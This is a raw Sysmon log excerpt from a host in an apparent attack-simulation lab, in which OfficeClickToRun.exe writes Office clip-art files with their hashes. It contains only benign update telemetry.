Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04196_.WMFMD5=E557EFB85A6210068F2F3DA0A0C16E6D,SHA256=A446D11805F8C54FA4D74A7EBDA770EE245D1243906F00562E3E90DB000B2F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04195_.WMFMD5=65F0E577179155795A20189A36BC32BB,SHA256=49F0EF178BAA1986F148C6C784D76027FD80107596E0FBC9676170E84844FA25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04191_.WMFMD5=8C3E32E36A35C8CFEF5CF83DB54DF524,SHA256=FBB1574A09AEFBED52C7FC256B57358F87557FF1A00DDE0CB91ED2A142828283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04174_.WMFMD5=DC49FBDA2E53723FD4132501AAEF81DC,SHA256=397D03E185959CB2EF569C92C1BA23EE196BDFD78A2F44B39C025F7FD64FA4EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04134_.WMFMD5=3FBB5D8B8F789F1E4E346AC3E78A97C2,SHA256=FEB29299AA9A45A7019FE9CFBA7A12EC7C68FB4952B44A0F09A18866EB42E94F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04117_.WMFMD5=189D5A65D8432F5DC0559FBE98BA3144,SHA256=63B73E22DD901686AB51898B035DF8944FDE9F71107BF1A2EB3B99EC21A7DE5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04108_.WMFMD5=212F30692752A282EDB0E219F86AACD3,SHA256=E9E562C117C4CEF9900DEBA5274308EFD43BBAABFEF1D2AB872703342B623E25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN03500_.WMFMD5=2451AECF982BE7D155B79A774E78835D,SHA256=60B4E1A5BD21F79EF3FBE87C83EAFFED1FC0BDA72DC79FA0E03E0D115DD00227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN02724_.WMFMD5=EBA8D1703E9ADF90DFDC385B65ED7056,SHA256=2BF7C1FD54812BE96A3493E0E880CCAC4192B8BE37B596C6AA162C5B3219AAB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN02559_.WMFMD5=E31223DB3961D3F64AD4A5FCD11E2819,SHA256=3AFBDA7D689160B6A4B58B52E4AD11F748D715AEC92EFF367CC76ACC3C6F76B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN02122_.WMFMD5=15FE603146B75D55C2D1DDFEAB0261BE,SHA256=F877CDE05B20B4BEB2F32C80D6682D79846F7D249A86320C136EBB8E5B9D378E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01545_.WMFMD5=BCCC5E5A95F5EF9774D78F93D16341DF,SHA256=0BF2067A3ADE65F1A74113E1CD22A634F2DEDFB1D142CC00A9B9FF8D45E34840,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01251_.WMFMD5=A532A091F445BE07F341A5BB9B77787C,SHA256=E9640ACF70804D649CC6D238FA20601559A86388B357AA11352F7EAC6AB96674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01218_.WMFMD5=ADFC633897D788B8871C62251FAE2B78,SHA256=2D40BEF086F75DC4D96A6A1E2A3E8448E4C651B5F3425EC9905602295530D0AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01216_.WMFMD5=F3F56A700BFFE32B64EE86B2AB0194FB,SHA256=A7EC6BF3296EDC8BE0AD78D30657F8E8357EE1E96299B4641D6BE590ADFD921A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01184_.WMFMD5=D6FECD845218B2F50DB187531D704CA7,SHA256=2AB3DCB8EE83DA9DB0F9D641E2D6FD8C15970568E115301ACA7E5D3D290FD8A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01174_.WMFMD5=EAE196AC607E13323A692FA53FFE8D31,SHA256=DB16A89C5C9EDE114318168226A73F423EC4B0B22D3D3D26DBB5531BBA731DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01173_.WMFMD5=3FA8AA4E9C980D130DEB070F6C5338FD,SHA256=036F9267C03E7DA59A9133BD7D7CFE7430859C08EC10539BDA29367E77A74451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01084_.WMFMD5=D9673281DDDE2451C4DB7F9BD47DA1C4,SHA256=0FA21A4FFE30FBE168D7613CA6FA152C2F13A4F26722DF5E10FEE89CC7ACC403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01060_.WMFMD5=E58E157DF04B859ABA46E894314928CD,SHA256=4B24CD74E4CBB70E68F859F7EC6D22EC2D958B59586959B5FD4884854444BB59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01044_.WMFMD5=44DFE7FD680BEEC582AA4EB3C5F07CA3,SHA256=BD09FDA27AF8D3646C4984A05938A7FE007CB126828B55C9D87EE5E20981107B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN01039_.WMFMD5=BAE60BE5E3A3D5DDFF03239DE4F18972,SHA256=0EF243D0CF9155B966529EDA38B094409F23CB1A7FAA1A4D043B383D9A127DAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN00965_.WMFMD5=6AC7105BAFB4846C1917CFAB48CE6F4E,SHA256=8DCA4872ACBC99504029AF46029C6E96553FDED3BC6188890DE0B5BD3F3711AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN00932_.WMFMD5=8BDC5B20C6EB532A7D97086EDBD4724C,SHA256=92F385C3489EBD31F1AEAE331917EFA3303DDCD6FC11E95962FBB182EFB4AD6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN00914_.WMFMD5=5B21139AD2BD6442864EE68CDEBF8EF0,SHA256=8B774EC8EDE769C1343BF61811B3E9B0AFBFFBFDFC985E412F41ADB73BEDE0B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN00853_.WMFMD5=7891EA2F728FE0CC8A05B790B9C1BF0C,SHA256=4A8D6FD286E7BA09CFAF3E699FE4CE6BDD68060D599CEA3B1E9828DF87932579,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN00790_.WMFMD5=F5F4AEB43E2CA141A4F91B87CF6503D4,SHA256=792FFB9746ED028B2891379DFB3B52A3E8A1DA3A4C7F7552F28BAB6A934DC94B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN00015_.WMFMD5=95091CAE6A5547B7158DFC6909E39EE5,SHA256=52BAE2DBBDACBE3C1CD94CA784EA5709052A10C9E99482B39FAD93F4FD32C340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN00010_.WMFMD5=AF0F64C1F166F245CCCBA735926341AC,SHA256=24AF793E442261819CE9724B856DFF7BCE374664E028130C1526E0E503313E86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00176_.GIFMD5=7D052F06BB26118664E16A362A625722,SHA256=CF9892B9B3D8DDAC876336D116BEAB91195893937C8BFA8B8220B96A9795DB84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00175_.GIFMD5=76E0739514D553B628AB13D5367D5874,SHA256=8A3A12020B0D2CC27A3739B8F3DB49E6BDDEC83B790BFF4D3C51E0C809655958,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00174_.GIFMD5=21BE4A52703F35D937BF67FA78475842,SHA256=146CE423B63DBCBC6B5E2F9FCE9F2F533ADF27863FEDB894681206EB8713042B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00172_.GIFMD5=48C307A9A96FDFA4CB4DCFF50106CF51,SHA256=77DA42EA9EC0D273E5FE71917827E7F935420511E52515E80371ADD27C63EEA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00171_.GIFMD5=EBDBD008AF8BA734D7A6CB0F328F9ACB,SHA256=FAD820C3B4349F796E01EC7DBCC4DF55DE8ED08EC812FF7B6402128778DA29FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00170_.GIFMD5=1371364A88FB7B9EA97ECD3B04B5E262,SHA256=E7B377F2DF34A68B1C325AC9BCED27530888DD01A56AF07D74F9C7E7C6B0CD80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00169_.GIFMD5=716C63A5C976CC363C57975C40FD6D1E,SHA256=88CEFD711AD9F8964B3B179A4D8A37DB05DC8F34198164D2DA77731D63A6C5EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00167_.GIFMD5=120AAA23468A53D54E6F93E62D554E24,SHA256=E4EED8934D99F9B1BCD186F685A449F7E35B4A9A1B38331D1C291B4458404D0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00165_.GIFMD5=A01E67ED18B64D9F53821BA2EED46555,SHA256=848D7E8FFA1F485C83868E2B53E02D6E307A606855335CCE61554A3CC839D4C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00164_.GIFMD5=7D60FB8CCA993EA1C9ADC0DE1F026E41,SHA256=C26D0558CFAE6CC1B9B8DFCEB30EA5142398E2B04ADAF26254A6CEB691383F1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00163_.GIFMD5=383213EF7F2BA06EB0B2D60F3B6CF5A5,SHA256=2C7CF6D155E71D38F67005060842F7A85887EF08F9C1495966F2C178B799BB55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00161_.GIFMD5=5320A6DE1F6D810BAA21E5D56E9B8982,SHA256=6B67722066F37EDF0D34A50780E67FD9193C5E36473FDDEC389D52686D28700F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00160_.GIFMD5=7B0CE00455F9CCCDF41A3F1BA4A9F041,SHA256=8F02D33621BE22D85D8F821332320C97C2208C75E5FD10E368012DF39AAFE35D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00158_.GIFMD5=F8BA91E5E84E27173DCF9279C7C3DE31,SHA256=546B880CE92961730F17BCB9B3B2BB49F967C0EB02F4A4000A79E9344A5132CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00157_.GIFMD5=77AB2AA03E7A3FCC677D136A4F8875DE,SHA256=0E6325AE25D3BE6D879B124C79C2C144A8FA307F8974BABAC0ACB86BE9E3705B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00154_.GIFMD5=9A6292262446E4007A45BDE905F8009E,SHA256=B86A785BDDD9F7C5D6C53B99AAD9901C454717B6BB20610142EE4AE92B18E06B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 